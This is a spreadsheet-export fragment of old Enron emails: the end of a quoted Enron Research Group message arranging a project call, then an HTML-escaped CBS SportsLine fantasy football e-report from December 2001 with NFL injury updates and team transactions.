&gt; have spoken with David Branchcomb to see if Henwood can help with this_x000D_
&gt; project in our time frame (results needed by end of January), and he_x000D_
&gt; suggested that we speak directly with you about the project._x000D_
&gt;_x000D_
&gt; I will try and give you a call later today (Wednesday afternoon_x000D_
&gt; in Houston,_x000D_
&gt; Thurday morning, Adelaide) at around 9:00 A.M. your time to see we can_x000D_
&gt; describe for you the project in more detail._x000D_
&gt;_x000D_
&gt; Regards,_x000D_
&gt;_x000D_
&gt; Stinson Gibner_x000D_
&gt; Enron Research Group_x000D_
&gt; (713) 853-4748_x000D_
&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Dec 2001 04:53:16 -0800 (PST)</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for Big E 12/28/01</t>
  </si>
  <si>
    <t>&lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;&lt;html&gt;&lt;HEAD&gt;_x000D_
&lt;!--_x000D_
_x000D_
_x000D_
You are receiving these e-reports because you have signed up for_x000D_
CBS SportsLine.com Fantasy Football.  The default format for these_x000D_
reports is HTML, however if you are reading this text your_x000D_
mail reader is not displaying it as HTML.  To change to_x000D_
text mode, or to customize, reschedule, or turn off these_x000D_
reports please to to the URL below:_x000D_
_x000D_
http://football292.fantasy.sportsline.com/mp/options-ereports?league=ene&amp;owner=45547.3_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--&gt;_x000D_
_x000D_
&lt;BASE HREF="http://football292.fantasy.sportsline.com/mp/"&gt;_x000D_
&lt;/HEAD&gt;&lt;BODY TEXT="#00000" ALINK="#ffff00" LINK="#0000ff" VLINK="#0000ff" BGCOLOR=#000099&gt;&lt;CENTER&gt;&lt;TABLE BORDER=0 WIDTH=716 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD&gt;&lt;A HREF=http://www.sportsline.com/links/6/1/163/sffer1225th.cgi&gt;&lt;IMG BORDER=0 SRC=http://images.commissioner.com/images/splash/football/SPLN_mgmt_ereport_header.gif&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;TABLE WIDTH=100% CELLPADDING=10 CELLSPACING=0 BORDER=0 BGCOLOR="#ffffff"&gt;&lt;TR&gt;&lt;TD&gt;Attention Fantasy Members! It's time to get an early start on that New Year's resolution. MVP.com is offering FREE Standard Shipping in our Fitness Shop until 1/17/02. &lt;a href="http://www.sportsline.com/links/6/1/217/sffer1228e.cgi"&gt;Click here to see what we have to offer.&lt;/a&gt;&lt;BR&gt;_x000D_
&lt;BR&gt; _x000D_
Save $.05 a gallon on the gas that keeps your car's engine clean. &lt;a href="http://www.sportsline.com/links/6/1/226/sffer1228c.cgi"&gt;Click here&lt;/a&gt; to apply online.&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;a href="http://www.sportsline.com/links/6/1/223/sffer1228v.cgi"&gt;Win&lt;/a&gt; a VIP Vegas Vacation! OR &lt;a href="http://www.sportsline.com/links/6/1/223/sffer1228v.cgi"&gt;Win&lt;/a&gt; $600 CASH!&lt;/a&gt;&lt;BR&gt;  _x000D_
&lt;BR&gt;_x000D_
_x000D_
	&lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;_x000D_
	&lt;TR&gt;&lt;TD bgcolor=black&gt;&lt;FONT FACE="verdana,arial,helvetica" size=1_x000D_
color=white&gt;&lt;B&gt;Brought to you by&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
	&lt;/TABLE&gt;_x000D_
	&lt;TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;_x000D_
&lt;TR&gt;_x000D_
&lt;TD colspan=2&gt;_x000D_
&lt;IMG SRC="http://images.commissioner.com/images/ads/ereports/sponsorbar16.gif" USEMAP="#menu.map" width="417" height="25" border="0" ALT="Sponsorship Bar"&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;_x000D_
&lt;MAP NAME="menu.map"&gt;_x000D_
&lt;AREA shape="rect" coords="0, 1, 83, 25"_x000D_
href="http://www.sportsline.com/links/6/1/217/sffer1228e.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="83, 1, 166, 25"_x000D_
href="http://www.sportsline.com/links/6/1/226/sffer1228c.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="166, 1, 249, 25"_x000D_
href="http://www.sportsline.com/links/6/1/223/sffer1228v.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="249, 1, 332, 25"_x000D_
href="http://www.sportsline.com/links/6/1/163/sffer1228t.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="332, 1, 415, 25"_x000D_
href="http://www.sportsline.com/links/6/5/3/sffer1227ftl.cgi"&gt;_x000D_
 _x000D_
&lt;/MAP&gt;_x000D_
_x000D_
&lt;/TABLE&gt;_x000D_
&lt;BR&gt;You are receiving these e-reports because you have signed up for_x000D_
    CBS SportsLine.com Fantasy Football.  To customize, reschedule,_x000D_
    or turn off these reports please _x000D_
    &lt;A HREF=http://football292.fantasy.sportsline.com/mp/options-ereports?league=ene&amp;owner=45547.3&gt;click here&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;NFL Reports,&amp;nbsp;Player Updates&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FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=4&gt;Latest NFL Player News&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1859&amp;"&gt;&lt;B&gt;James Thrash&lt;/B&gt;&lt;/A&gt;, WR PHI - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Thrash is listed as questionable with an ankle injury, but he is expected to play against the Giants. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1515&amp;"&gt;&lt;B&gt;Patrick Jeffers&lt;/B&gt;&lt;/A&gt;, WR CAR - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Jeffers may see some increased playing time this week because of Muhsin Muhammad's persistent toe problems. Isaac Byrd, however, still should start in Muhammad's place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=187389&amp;"&gt;&lt;B&gt;Sebastian Janikowski&lt;/B&gt;&lt;/A&gt;, K OAK - McKay Neal &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Janikowski (groin) has been kicking in practice. He is expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=146366&amp;"&gt;&lt;B&gt;Terrence Wilkins&lt;/B&gt;&lt;/A&gt;, WR IND - The Klap &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Wilkins (hamstring) has returned to practice. He may be able to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=12181&amp;"&gt;&lt;B&gt;Stephen Alexander&lt;/B&gt;&lt;/A&gt;, TE WAS - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Alexander (leg) was placed on injured reserve, officially ending his season. Walter Rasby will continue to start in his place, but Zeron Flemister has emerged as the team's best receiving tight end with Alexander out. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=12429&amp;"&gt;&lt;B&gt;Matt Hasselbeck&lt;/B&gt;&lt;/A&gt;, QB SEA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;The &lt;i&gt;Seattle Times&lt;/i&gt; says Hasselbeck's season might be over. Mike Holmgren said he would only use him in an emergency this week, and the Seahawks coach may elect to have Hasselbeck use the season's final two games to rest his injured shoulder. Trent Dilfer will start at San Diego this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=133462&amp;"&gt;&lt;B&gt;Amos Zereoue&lt;/B&gt;&lt;/A&gt;_x000D_
, RB PIT - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Zereoue missed practice on Wednesday with a shoulder injury. He is listed as probable for this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1871&amp;"&gt;&lt;B&gt;Todd Bouman&lt;/B&gt;&lt;/A&gt;, QB MIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bouman practiced without pads on Wednesday. If he cannot practice fully on Thursday, Spergon Wynn will get the start this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1235&amp;"&gt;&lt;B&gt;Keenan McCardell&lt;/B&gt;&lt;/A&gt;, WR JAC - Tori Kuykendall &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
McCardell is listed as probable with a thigh injury. He should be able to start this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=235203&amp;"&gt;&lt;B&gt;Chris Chambers&lt;/B&gt;&lt;/A&gt;, WR MIA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Chambers is listed as questionable with an ankle injury. He practiced on Wednesday and should be able to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1288&amp;"&gt;&lt;B&gt;James McKnight&lt;/B&gt;&lt;/A&gt;, WR MIA - Baja &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;McKnight is listed as questionable with an ankle injury. He practiced and is hopeful of playing this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=235123&amp;"&gt;&lt;B&gt;Travis Minor&lt;/B&gt;&lt;/A&gt;, RB MIA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;The &lt;i&gt;Miami Herald&lt;/i&gt; reports Minor will get more work on offense this week. Lamar Smith will remain the starter, but the Dolphins are hoping Minor can inject some life into the offense. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1116&amp;"&gt;&lt;B&gt;James Stewart&lt;/B&gt;&lt;/A&gt;, RB DET - Tori Kuykendall &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;The &lt;i&gt;Detroit Free Press&lt;/i&gt; says Stewart is not expected to play this week because of a sprained ankle. Lamont Warren and Cory Schlesinger will assume most of the workload in his place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=235119&amp;"&gt;&lt;B&gt;Mike McMahon&lt;/B&gt;&lt;/A&gt;, QB DET - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;The &lt;i&gt;Detroit Free Press&lt;/i&gt; says McMahon is not expected to practice or play this week. Ty Detmer will start in his place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=12409&amp;"&gt;&lt;B&gt;Brian Griese&lt;/B&gt;&lt;/A&gt;, QB DEN - Fear &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Griese told the &lt;i&gt;Denver Post&lt;/i&gt; he is ready to take on the Broncos, although Mike Shanahan questioned how effective he would be in his return. "How do you know with a concussion?" Shanahan said. "There should be no side effects. Hopefully there's not. But we have learned a lot through the years about concussions and how serious they can be,!_x000D_
 a!_x000D_
nd hopefully that's something in the past and they won't reoccur." &lt;/FONT&gt;_x000D_
&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=187642&amp;"&gt;&lt;B&gt;Aaron Shea&lt;/B&gt;&lt;/A&gt;, TE CLE - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Shea is expected to miss the season's final two games with a shoulder injury. O.J. Santiago should remain in the starting lineup in Shea's place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=133415&amp;"&gt;&lt;B&gt;Akili Smith&lt;/B&gt;&lt;/A&gt;, QB CIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Smith underwent surgery on his left hamstring. He is expected to be ready for training camp next season and will compete for the starting job. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1321&amp;"&gt;&lt;B&gt;_x000D_
Wesley Walls&lt;/B&gt;&lt;/A&gt;, TE CAR - Tori Kuykendall &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Walls is listed as questionable with a knee injury. He was expected to be evaluated again on Thursday. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1203&amp;"&gt;&lt;B&gt;Muhsin Muhammad&lt;/B&gt;&lt;/A&gt;, WR CAR - Fear &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Muhammad (turf toe) is not expected to play this week, and may miss the rest of the season. Isaac Byrd will likely start in his place again. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=235216&amp;"&gt;&lt;B&gt;Travis Henry&lt;/B&gt;&lt;/A&gt;, RB BUF - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Henry will sit out again this week with a sprained knee. Shawn Bryson will start for the second consecutive week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1069&amp;"&gt;&lt;B&gt;Steve McNair&lt;/B&gt;&lt;/A&gt;, QB TEN - Rocks &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;McNair missed practice Wednesday because of back pain.   "I'm going to try to do some things tomorrow and hope it loosens up and not have as much pain as I had today," McNair said.   "I'm not going to go out and try to force the issue. If it's still sore and still tight where I can't have all my mechanics right, I'm not going to force the issue."     The Titans listed him as questionable yet again Wednesday, but McNair likely will play &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1152&amp;"&gt;&lt;B&gt;_x000D_
Jerome Bettis&lt;/B&gt;&lt;/A&gt;, RB PIT - Fear &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bettis sat out Wednesday's practice, and indicated he might not play in the regular season's final two games. "You want to take care of the injury first and if that means not playing, that means not playing," Bettis told the &lt;i&gt;Pittsburgh Post-Gazette&lt;/i&gt;. "But you want to make sure you're healed up. The team playing as well as it has played allows me the opportunity to get healthy. I'm using it very, very wisely." &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=133297&amp;"&gt;&lt;B&gt;Martin Gramatica&lt;/B&gt;&lt;/A&gt;, K TB - Fear &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Gramatica sat out practice Wednesday, but is expected to test his injured leg on Thursday. Doug Brien and Brad Daluiso worked out Wednesday for the Buccaneers, who might sign one if Martin Gramatica can't kick against the Baltimore Ravens this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=12429&amp;"&gt;&lt;B&gt;Matt Hasselbeck&lt;/B&gt;&lt;/A&gt;, QB SEA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Trent Dilfer will start this week in place of Hasselbeck, whose separated left shoulder is too sore for him to play.    Coach Mike Holmgren said Wednesday that Hasselbeck aggravated the injury, which he's had since the third week of the season, against the New York Giants last Sunday.   "There's a chance I might have him and he could play in an emergency-type situation, but he's pretty sore," Holmgren said.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1116&amp;"&gt;&lt;B&gt;James Stewart&lt;/B&gt;&lt;/A&gt;, RB DET - Tori Kuykendall &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Stewart is day to day with a sprained ankle. His status for this week's game is unclear. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1264&amp;"&gt;&lt;B&gt;Jeff Graham&lt;/B&gt;&lt;/A&gt;, WR SD - Martin Cuilla &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Graham may miss his second consecutive game this week because of the death of his father. With Tim Dwight (lung) still ailing, Trevor Gaylor may have to start again. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=12436&amp;"&gt;&lt;B&gt;Skip Hicks&lt;/B&gt;&lt;/A&gt;_x000D_
, RB TEN - FIBSABs &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Hicks is expected to miss this week's game with a hamstring injury, and may miss the rest of the season. Eddie George should assume a regular workload once again. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1094&amp;"&gt;&lt;B&gt;Emmitt Smith&lt;/B&gt;&lt;/A&gt;, RB DAL - Rocks &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Smith is day to day with a hip injury. He is expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=187401&amp;"&gt;&lt;B&gt;Peter Warrick&lt;/B&gt;&lt;/A&gt;, WR CIN - Top Dogs &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Warrick, who was benched late in last week's game, is expected to start. He has been a disappointment this year and Fantasy players should not use him at this point of the postseason.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1871&amp;"&gt;&lt;B&gt;Todd Bouman&lt;/B&gt;&lt;/A&gt;, QB MIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bouman (thumb) may attempt to practice late in the week. His status remains unclear for this week's game, and Spergon Wynn is available to start if needed. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=pro-player-updates&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;start=30&amp;"&gt;More Updates&lt;/A&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;NFL Reports,&amp;nbsp;Transactions&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&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BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/26&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;pro_team=1&amp;"&gt;&lt;B&gt;Arizona Cardinals&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Placed guard Pete Kendall on injured reserve; signed tight end-long snapper Nathaqn Hodel from the practice squad. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;pro_team=10&amp;"&gt;&lt;B&gt;Detroit Lions&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed linebacker Eugene McCaslin to the practice squad. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;pro_team=14&amp;"&gt;&lt;B&gt;Kansas City Chiefs&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Agreed to terms on a three-year contract with wide receiver &lt;A HREF=players?league=ene&amp;owner=45547.3&amp;key=1517&gt;Reggie Jones&lt;/A&gt;; signed cornerback Ahmad Hawkins to the practice squad. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;pro_team=15&amp;"&gt;&lt;B&gt;Miami Dolphins&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed linebacker &lt;A HREF=players?league=ene&amp;owner=45547.3&amp;key=135446&gt;Corey Moore&lt;/A&gt; to a two-year contract; placed linebacker Derrick Rodgers on injured reserve. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/24&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;pro_team=9&amp;"&gt;&lt;B&gt;Denver Broncos&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Waived wide receiver &lt;A HREF=players?league=ene&amp;owner=45547.3&amp;key=1779&gt;Keith Poole&lt;/A&gt;; signed cornerback Delvin Hughley and guard Michael Moore.&lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
